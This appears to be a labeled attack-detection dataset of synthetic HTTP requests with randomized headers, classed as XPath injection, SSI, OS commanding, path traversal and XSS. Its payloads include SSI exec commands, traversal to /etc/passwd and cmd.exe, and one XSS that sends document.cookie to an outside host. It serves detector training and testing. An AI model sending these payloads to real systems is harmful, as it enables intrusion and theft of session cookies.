Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 378 196.189.21.245:66 "hoiooiLnwuhilt51e" "Sun, 15 Jan 06 06:34:10 UTC"
X-Forwarded-For: 2.74.16.0
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44111
Start - Id: 35797
class: XPathInjection
GET /4sh5hgTt.exe?whtroltr=xe&dujater1lie=476&e6r9it2tiia=4290+++or++0%2FiW2%2FCsm%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+++++or++++1%3D HTTP/1.0
Host: www.kf3itov1cW.cz
Connection: close
Accept: */*;q=0.2
Accept-Charset: cp-950;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: Ewq-T, bow-ng;q=0.4, yaMIt-ih;q=0.0, ee0nf-sfsl;q=0.2
Cache-Control: no-cache
Client-ip: 111.27.1.64
Cookie: 4ZaaQ=33577516;uellh=Ie~
Cookie2: $Version="55"
Date: Thu, 08 Apr 10 19:14:04 CET
ETag: "BC6ce8C_dnKt4s0Z."
Expect: 100-continue
From: o6sanad@eton8m.net
If-Modified-Since: Fri, 18 Feb 05 06:02:57 GMT
If-Unmodified-Since: Sun, 08 Jan 06 10:17:12 UTC
If-Match: *
If-None-Match: *
If-Range: "TD6isthNtm7jY26y"
Max-Forwards: 1
MIME-Version: 1.8
Pragma: io3mm3dt='Urr'
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Referer: /chmntas0/roowd/eGEih.jsp
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/9.2 (Windows; U; Win98 0.2; td-ti; rv:1.0.4) Gecko/66121588
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 1bNUer/1.3 245.161.192.158, 8.2 www.dolma.gif, ual/3.0 6.114.3.31
Transfer-Encoding: deflate
Upgrade: n2smtz/0.7
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 240.46.36.222
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35797
Start - Id: 40368
class: SSI
GET /tW8TiiTsE18E/wHvelH2Bq/hyeiySzheL/8TDVS6RS5cN/itHs/2.oUTGF4fjL_-I/n@U/lKetelnetokoRVfen15Z/f4/-lULPYm/c@kjd/aIgysCS4@4yBm8q4dETS.php?RsaoHischspdh=zea&huporr9helfgemi=0004115335&jheihdea=tKPnUA3x&SzSKB=2102&mu24e6in=nao1bot3tl&iPlvse=7108&f2OeS=8097577 HTTP/1.0
Host: www.rs0os.org
Connection: keep-alive
Accept: video/*;q=0.0, application/postscript, audio/x-wav;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: <!--#include  virtual="d:\windows\autoexec.bat"     -->
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Cookie: es0cT=77rocnssiy5mimdio;a0iACmp=aeh Ud)1odeNAi o;nA25MR-Lfandpassthruz=Ardml0;ttCpp=etpn/ c;eung1tpo9ewee8=4rsTtSaonndhhuevwt;g8ndlttemEq=qySswT
Date: Wed, 12 Dec 07 19:30:59 CET
If-Modified-Since: Tue, 18 Aug 09 20:44:37 CET
If-Unmodified-Since: Fri, 20 Jan 06 08:05:59 CET
If-Match: "mfV8e@t_cT9-KisT"
If-None-Match: *
If-Range: *
Max-Forwards: 4240
MIME-Version: 3.2
Pragma: lut='7sniA'
Proxy-Authorization: Digest response="375AA67fFd3b4C5c7CCa0Abe89ed9D86"
Authorization: hvtbea bsecn=reorLaa
Referer: http://www.ctzis.net/iaha/haouz/Iortapna/vi03si.cfm
TE: gzip,chunked;q=0.1
User-Agent: lTt5/6.2.1.5.6
UA-Disp: 4495,595,8
Via: 0.8 233.85.144.177
Warning: 639 110.21.4.33 "mwrreisntcmcs169in" 

null

End - Id: 40368
Start - Id: 44139
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: 152.242.76.184:57693
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.6, x-mac-arabic, windows-1252, x-mac-arabic;q=0.0
Accept-Encoding: *
Accept-Language: lsCiv-aeimi, fnynfa-nNceea, 0mhbah-iAs
Cache-Control: min-fresh=7887
Client-ip: 94.187.10.150
Cookie: ildrta4scee=phphrusraoy5riyeoiur;7E;gtfepoAtve=wit<;ssa43m=E2dr;@S63Ts8W=optb;Oine_aeJEkvK3=oeadLrS
Cookie2: $Version="03"
Date: Tue, 08 Apr 08 07:29:20 GMT
ETag: W/"1NbZPG6M0jtLITPTw7L"
Expect: Fzazt0Oa
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 29 Jan 10 02:08:33 CET
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Dec 08 03:15:45 UTC
Max-Forwards: 541
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM bzRQbmppdWxvc2hiaWlpc2k2YkFlZTBydGh4eWJwZXlldHRBbmw2am5h
Authorization: ogSor oauhe=c6eam
Range: -1045,34811-03148
Referer: http://www.oHerr.be/rteeg.js
TE: chunked;q=0.0,trailers,trailers
Trailer: Upgrade
User-Agent: oatcd (ecBjR4; de.sVShWk; ssbreiXWA; sogg1xcLC; rJOFFWBR)
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: 4.5 59.90.147.15
Transfer-Encoding: identity
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 388 www.ow2gly.gif:78233 "snkbjeA6viit9iz8Nd" "Tue, 03 Oct 06 24:41:44 GMT"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44139
Start - Id: 44282
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.etdlebx.com
Connection: ipii
Accept: text/xml, application/rtf;q=0.1, audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: oot4etgh-scei
Cache-Control: no-cache
Client-ip: 192.246.21.91
Cookie: ngt4gJyeihrbno=71108;imetma=3e?mEtnme
Cookie2: $Version="75"
Date: Fri, 19 Mar 04 14:50:25 CET
ETag: "lRY.im-Vf8FuriFi"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 18 Nov 04 19:40:33 UTC
If-Unmodified-Since: Tue, 16 Sep 08 18:31:07 UTC
If-Match: *
If-None-Match: *
If-Range: "-Rav@SdstaZnQvZ"
Max-Forwards: 3
MIME-Version: 6.9
Pragma: oercr=cko5
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: Basic N2lObmV0OmhhaXdOd2xp
Range: 639-682,28229-
Referer: http://www.i3jL.gov/zuwst4O/btdn9tco/elao/aiti/ryMttlr.htm
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: Mozilla/1.6 (X11; U; SunOS sun4u 5.0; be-5o; rv:6.8.4) Gecko/07108000
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: rnul/6.4 www.leezneo.js
Transfer-Encoding: gzip
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 76527711
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44282
Start - Id: 40281
class: SSI
GET /0ocngmAuyEheh/eklei/9hrocs.aspx?7kprocessing-instructionOftphuVj4tv=cet6ilDttWucn0qe&Qg8PscriptVoXN0=74758&M.HtL47=927267&vao=nincludeHo&htpassbox58rTeq4=%3C%21--+%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5CoTnrqt%5Co8eAsdor3c%5Ctlabraa.exe++++d%3A%5Cnnfjznlr%5Cwww.ieliilni.org%5Cpdiai%5Cdatabase.mdb++++%2Fx+++exporttofoxpro%22--%3E&sopbrhdlr0e2tbs=E6ehp%7Edg&itmez6du2ufn8=8sahbotztre&o82=hE-1wLu.Qw5&ttfite4get=aF5&auo9lst=ssbHX1TXmn-p&vhU9=1ta HTTP/1.0
Host: 224.49.15.140
Connection: close
Accept: text/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: alor3o-sbou;q=0.2, hh-nt
Cache-Control: ziw=whsksttn
Client-ip: 28.25.194.6
Cookie: .0N_yshutdownY_SR=sdLHqNAzkrYX;kiee=fntyoB0;hlrmIkcAii=enyhctcMhwinntCoda:ew;Kcoelgone=9191;wa8YES=11330624;kOStImtosu=264614
Cookie2: $Version="114"
Date: Sat, 25 Sep 04 24:46:35 CET
ETag: W/"OW87M.Z_H28iIF_"
Expect: ur5b1dl
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Sun, 20 Dec 09 07:18:32 GMT
If-Match: *
If-None-Match: "ZptszONkLvdLgvg"
If-Range: Wed, 21 May 08 14:17:31 GMT
Max-Forwards: 5
MIME-Version: 9.5
Pragma: E='0j91ari'
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest nc=596D85c6
Range: 37574-,839789-
Referer: http://mlent.de/kreniie/s6nntne.js
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/1.8 (X11; U; Solaris 1.8; xa-x0; rv:6.3.5) Gecko/15873540
UA-CPU: MIPS
UA-Disp: 7013,7944,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1099x290
Via: 4.6 www.epAte.css:34305, etE6/5.2 147.219.143.13
Transfer-Encoding: identity
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 147.185.144.226
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40281
Start - Id: 46032
class: PathTransversal
GET /eP/f6/pqonnectantoaQil5ciI/nbmUe/yeodsreoeaisrce/duaifjecttnOeobmeal/tdeeuhfaom4oeuhp/eoGzw/NI/to0@HTIDXF.shtml?nmnae=eu%3E%29g&AatlzSrf8ssfr6f=97720420&vsbo0O=esasd%2BeAa9etdirn1&yyutan=38298371&Lpum=7053&e7tdd=+l&otA=Nss+nlvsgeMlibaeihoe&cieatsoelaetoec=217&fagbeqaniys7t=dhs HTTP/1.1
Host: 204.209.15.101
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Accept-Language: aAsu-nr;q=0.7, thi-Eiqi, co8I-aceii
Cache-Control: no-cache
Client-ip: 160.240.116.78
Cookie: Hq6@F@r=iframetorm;n8cC8ueeli=Tfelseb;5yA6=eVvu;eaerheAsmIyiere=IdwimgmsiHynem;yepnseic2aTshl=jmjcoosNilagNR4pac;aps=stltey3nsiiguna
Cookie2: $Version="18"
Date: Sat, 17 Sep 05 11:24:20 UTC
ETag: W/"WS2zty5IHQ7TIKNBfw"
Expect: 100-continue
From: epmndmfY@vm5t.be
If-Modified-Since: Sun, 15 Jun 08 05:44:06 UTC
If-Unmodified-Since: Thu, 28 May 09 20:01:25 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 18 Jun 08 20:25:38 GMT
Max-Forwards: 35
MIME-Version: 4.8
Pragma: teeliO=ts9Rotx
Authorization: Digest qop=ySteten
Range: 9679-,0-89825,53-
Referer: http://www.nweotdin.st/6isd/xlNgh.htm
TE: deflate,chunked
Trailer: Authorization
User-Agent: Mozilla/2.2 (Windows; U; Win98 8.6; fe-aI; rv:1.1.0) Gecko/26058570
UA-CPU: Sparc
UA-Disp: 182,7559,16
UA-OS: Windows NT
UA-Color: color32
Via: 3.7 www.e0Iy.html, e9ehoc/5.9 73.164.17.150
Transfer-Encoding: gzip
Upgrade: 1eo/9.5
Warning: 143 www.eihfkbo.htm "7taunsi" "Fri, 01 Apr 05 24:33:27 CET"
X-Forwarded-For: 20.101.217.179
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46032
Start - Id: 49272
class: XPathInjection
GET /ae9gt/isKhNj6b47wKxg/spYRPu9a7ew/include1.rIA2YT75seuC.png?aits=i9w&15npqYlie=ta8iSNv.5&de=113497231&co=z26tmd6i%27+++or+++1%3C+++++n1fd%2FvoeC%2FLRt%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D19%5D+++++or++++%27owapS6l2%27++%3D%27&XtaeunnnNene=5ynoeLin%27u&rtqntacp=geraSkmochagroup+bynrf&a0rdq5=fsincludesew9http%3Azrn4rtph&EeetccdvcsmEz=%3Dmir%29tsuacd HTTP/1.0
Host: www.nson.be
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: identity, deflate, deflate, deflate;q=0.4
Accept-Language: *;q=0.9
Cache-Control: t='Cjeoq'
Client-ip: 88.174.167.80
Cookie: diirbAw3adrne=orcpweElhomeX);tssr=hamr7tach6fdeBtei3;aseEe=0203553232;wcieOpt4dgor9q=64163;eEntrp00bsaW=httw1mv8Vjl
Cookie2: $Version="090"
Date: Fri, 23 Apr 04 22:02:43 GMT
ETag: W/"-RDngPjuCzDvl8YcGOv0"
Expect: 100-continue
From: fnofaOs@a3rou.st
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Thu, 08 Dec 05 14:42:54 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 30 Oct 04 24:34:47 CET
Max-Forwards: 6
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: Basic bmRhb25TYkw6Y2U0cg==
Range: 590547-,3238-58700
Referer: /aabt/nqecte.html
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/7.2 (compatible; Konqueror/8.6; Windows NT; Ewayy)
UA-CPU: StrongARM
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: HTTP/1.1 91.202.249.237, HTTP/4.7 163.149.206.210:7, 2et/7.7 39.92.236.201
Transfer-Encoding: deflate
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49272
Start - Id: 48766
class: XPathInjection
GET /Tou/wBpRgV_Sy3eW/z0Kp/stoeoNhseep/entcrCtd6ya/rsIg2AhSdoGLct8Ych/cX/riaitceHlsolcntimsia/iaOri/Cs.jpeg?fh=to82%2FhlhxUt%2Faa19Le%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D+or+++++%27oja%27+%3D+%27&6EWtnuls3I0B=ejj77ap5I HTTP/1.1
Host: 234.159.182.90:71
Connection: ls3s
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: lp5-in8m;q=0.8, 5Agmebn-b;q=0.4, G-mcana;q=0.2, 3ead-mstqInh;q=0.8, eoez-e2gpi;q=0.8
Cache-Control: no-transform
Client-ip: 232.245.220.245
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Fri, 30 Mar 07 09:26:16 UTC
ETag: "JPkHbt63LZW@TgBTvjUE"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Fri, 23 Nov 07 20:57:25 CET
If-Unmodified-Since: Fri, 19 Mar 04 08:16:29 UTC
If-Match: *
If-None-Match: "Xw_SS_rfttntfSCuV"
If-Range: Mon, 23 Jun 08 24:48:18 UTC
Max-Forwards: 4
MIME-Version: 1.8
Pragma: ceet=ewcI
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: axoitr as3ea=nxterty
Range: -333764,-7
Referer: http://www.deer.biz/IgaCeZp/TthTtnro/0nbo/mdut.conf
TE: deflate,gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: Mozilla/6.2 (Windows; U; Windows NT 2.3; cn-ws; rv:7.4.4) Gecko/81742839
UA-CPU: MIPS
UA-Disp: 924,263,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: 3.9 www.edesotms.tiff:1, 3.4 201.178.12.215:8619, nntpp/4.8 www.ltTci.jpg
Transfer-Encoding: hjte
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 293 134.186.67.219:260 "nqtLnfhksiegnt" "Tue, 17 Mar 09 23:34:24 UTC"
X-Forwarded-For: 98.154.59.21
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48766
Start - Id: 40038
class: SSI
GET /sacz_QDq2/n0UtfRfsCooMuelajgex/m.f-uVPwwvCUNJEL/eu3teoient9/aHv@SXgSBIOG3_7G4/srn60kod/nrhqbmrAeleihe2lfudp/eilsnmskeocsdoEoh/o9KILYPFSM.nsf?hjnL=%3C%21--++++%23exec+++++cmd%3D%22%2Fbin%2Fls++++-l++++%2Fhome%2F1wmnOtX%2Fifosyn%22+--%3E&sdbier2ehe2rw=ti%5Cc0crtgei%3Ex HTTP/1.0
Host: 210.247.30.156
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.4, euc-jp;q=0.5, euc-cn;q=0.5, x-mac-cyrillic, koi8-r;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 160.214.20.200
Cookie: eweecmn5=hLXWoeKlnlSes5tnaE;ppnnbOfrom=sXIAKy27;4aTYJO=wl_o2;sautst=085943;SUbgnotw=r3c9i9aai7l
Cookie2: $Version="25"
Date: Wed, 11 Jan 06 06:55:34 GMT
ETag: "1oi95JajISSvSc6NmwV"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Thu, 25 Oct 07 19:23:18 GMT
If-Match: *
If-None-Match: *
If-Range: "flhmNs9s0HL2MpELUJpe"
Max-Forwards: 7
MIME-Version: 5.8
Pragma: e='is'
Proxy-Authorization: Digest username="tsbedo"
Authorization: Digest realm
Range: 41683-1312,-3
Referer: /rlst/huf4o/stas/h1tEc/helrhe.msf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.8 (compatible; 0eeedTslS; Win 9x; eja2l; anahta; oSliswIt)
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: oretoe
Upgrade: sonW0n/7.4, iecird/0.5, sihan/2.9
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40038
Start - Id: 47720
class: XSS
GET /e28jydscEeo/eprpOFshroTitce3Tsa/i04xAiwrh3ntntre/eImuR9tft/r2NubS0libU/sxTac8Y8DyARx0WPb/tBEfZSm/fecne5thaO5ni3e.js?rielaisgw=6&Mbgsoundexec.4=uesfhometerzselectd3edeleteua4&aetutim4faE0t=meiet%2F%3Bdelu%28mie9o%5Be+&boorL7FRP=2432&hetottgsniecl2l=%3Ca+href%3D++%22++++about%3A%3Cs%26%2399%3Bript+%3E%5Balert+%28%279eealEa%27%29%3B%5D%3C%2Fscript++++%3E+++%22%3E&ges=99999290 HTTP/1.1
Host: 149.253.189.70:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-3, iso-8859-7;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: oLlo='sjutu1'
Client-ip: 186.139.8.23
Cookie: omc8T=pihg;tgeern=httpeA;s5luar=w;hqurT0pgn=t2El;dhqH=nse
Cookie2: $Version="6"
Date: Thu, 15 Dec 05 21:44:39 GMT
ETag: W/".Yvf.hV0JUrMVXmG"
Expect: 100-continue
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Sat, 04 Feb 06 17:37:15 CET
If-Unmodified-Since: Wed, 22 Feb 06 24:05:12 CET
If-Match: "1o83EFYH4c9k9cMbn7"
If-None-Match: "ICfXt0tcyh3@APsya"
If-Range: Thu, 18 Aug 05 18:57:21 CET
Max-Forwards: 770
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: NTLM bjJkc2l0aHJvTmFTdHRFamljbmlyZ25lYXJtZHNpZWllZmRjdVRocmVidWU=
Range: 2174-,56-,-57382
Referer: /ild0sN/usozR/ennAol/Eshet/saruis.cfm
TE: deflate;q=0.7,trailers
Trailer: Date
User-Agent: ryhneOu2sbeal6tzUb4o
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5167x472
Via: 8.0 www.ilfmrnp.shtml
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47720
Start - Id: 49854
class: XPathInjection
GET /p1laov/aQpxI/hZ_Nt0FgWCBUj7b1/thholdrh40o/48ietlu4o9us/opsfc/st/m-bbRtPvoK8uS0NpK/o3naooillik/yq/riM.css?azweae5aerh7Mj=154+++++or++1%3C++DeN6ss%2Flhmh%2Fi1w%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+or+861%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&ihzX=1811802897&skdii5d=2&echoB3sEVimgyVxb=cfr5t&YOpanj=77822&sfannfotfii=457880&r9rnriz9e2in=wh&urT481lrzxs5m=9519 HTTP/1.0
Host: 162.72.26.190:7551
Connection: iaydi
Accept: application/*, application/postscript;q=0.7, video/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=2601
Client-ip: 90.191.214.185
Cookie: sWHvnvwzllu5siy=e;z1xgrdallQcopyW=95;O0iselect11dX6W=2mauTiuxQE;clJF-=j3B@ s~wp-etci0qen4gh
Cookie2: $Version="7"
Date: Sun, 04 Mar 07 08:31:52 GMT
ETag: W/"HtKEFG2QVS@P1.4FS"
Expect: 100-continue
From: oyrua@eNee.com
If-Modified-Since: Wed, 10 Dec 08 24:13:51 GMT
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "vn5tcbwjNsHEkPu_de"
If-None-Match: *
If-Range: Sun, 02 Dec 07 09:38:54 GMT
Max-Forwards: 07
MIME-Version: 4.1
Pragma: ijl7t=uo
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: xlE0 aelJ=NEonemxl
Range: 98475-041,374-
Referer: /pwnbnO/tns2/npn1.swf
TE: deflate
Trailer: Upgrade
User-Agent: vsnnuilaodSerbmo06a
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 967x245
Via: FTP/0.7 140.133.133.58
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49854
Start - Id: 47552
class: XSS
GET /qyi/yaoEgiaiddxoemiwbq/sRpeyA3hjwsQuBSZ/iZpIb0hG209crb71/n-IIFRfcvmx0HKgx/l17itPjeX7BfTOmZa.mspx?P@@Uk0GMNDmz=4382773056&doznhforeoR=%3Cimg++++src+%3D++%22ic++++%3E++%22++onmouseover+++%3D%22++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ngal.com%2Fcgi-bin%2Fil.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+%3E HTTP/1.1
Host: www.ccaday.uk:80
Connection: close
Accept: */*
Accept-Charset: windows-1252, euc-cn, euc-jp;q=0.1, iso-8859-2;q=0.8, macintosh;q=0.9
Accept-Encoding: identity, gzip;q=0.4, gzip
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 120.244.182.14
Cookie: r1vb=dMx@0jzgk;7dn09en=zi2fo;ieYisek4=433676;ssyEntzp4r=qpMtfgUvhxz;n9eT0e=prHLat5wtrhUDg;etii=cmT5aii4jeg0o
Cookie2: $Version="8"
Date: Tue, 15 Dec 09 15:53:14 CET
ETag: "5Prg8S_P@.fZQyoZ"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Mon, 17 Nov 08 16:13:56 CET
If-Unmodified-Since: Mon, 04 Feb 08 07:48:06 CET
If-Match: "eoyKEnb8nGT-xB-qzP"
If-None-Match: "qTkrEdgRX.XPC@P"
If-Range: Sun, 12 Oct 08 14:13:11 CET
Max-Forwards: 159
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM Nm5laWV0MGl2TnRzb0VhMnJrbG1pbmQ2ZWFkemN0Zzk1ckZCaGU=
Authorization: Basic Y21lbjpvbW9hc2U=
Range: 2718-09734,749039-
Referer: /txre/Z9EOmVN.jsp
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: ehondeeethi7auLfbm
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2187x3503
Via: HTTP/3.0 245.57.233.254:3034, fsm4/8.0 www.oclhx.tiff
Transfer-Encoding: letot; tfei9=lpsya
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47552
Start - Id: 45765
class: PathTransversal
GET /wplQSUmM/oKvSyl_XPfVXm/oPv/httpWCNh0649EDGgH/i7yybTSlZ/8o/e3g0O.ALhiAd.jsp?LE-6Jlu5TmQu=ls9chig&sjawci=a5HKktp4&bo5FTSSVmO=m&EW0Au_=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ftinatasi%2Fil%2Fntes%2Fngchli.php&rihreanetu=4682038&n6rgstu2unzedna=255137&eYfu=hnuyhN&Hbsrsda=poelp&oo4gt=8664053059&ereiet=t8g&1n4edrRrp=7s%3Bl&ptebjtl=lfa HTTP/1.1
Host: www.8rimC.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad, euc-cn, x-mac-turkish;q=0.1, iso-2022-kr;q=0.6, x-mac-arabic
Accept-Encoding: compress, compress;q=0.2, compress;q=0.4, compress;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 94.195.108.172
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="51"
Date: Tue, 28 Sep 04 14:35:46 CET
ETag: W/"ZuCaxTopQAS6sIGZ4"
Expect: evdontue
From: dsxeHs@whobloehb.be
If-Modified-Since: Wed, 11 Mar 09 15:21:02 GMT
If-Unmodified-Since: Sat, 18 Apr 09 10:36:09 CET
If-Match: "phZOoCP_Yg8fQDTwm"
If-None-Match: *
If-Range: *
Max-Forwards: 23
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: ehrxh feyrt=0igtd
Authorization: Basic YjRsT2VldTplcnZM
Range: -500252,934-3694
Referer: http://otwc.net/cnm9TeN/lovl/tsOvt/hetzh.swf
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 1.9; z8-al; rv:7.6.3) Gecko/35277324
UA-CPU: MIPS
UA-Disp: 517,832,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: 1.2 52.118.115.52
Transfer-Encoding: gzip
Upgrade: nnecre/6.0, mthEer/2.6, 07z/4.8, yHnm/7.3
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 217.11.93.180
X-Serial-Number: 5959177395
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45765
Start - Id: 47172
class: XSS
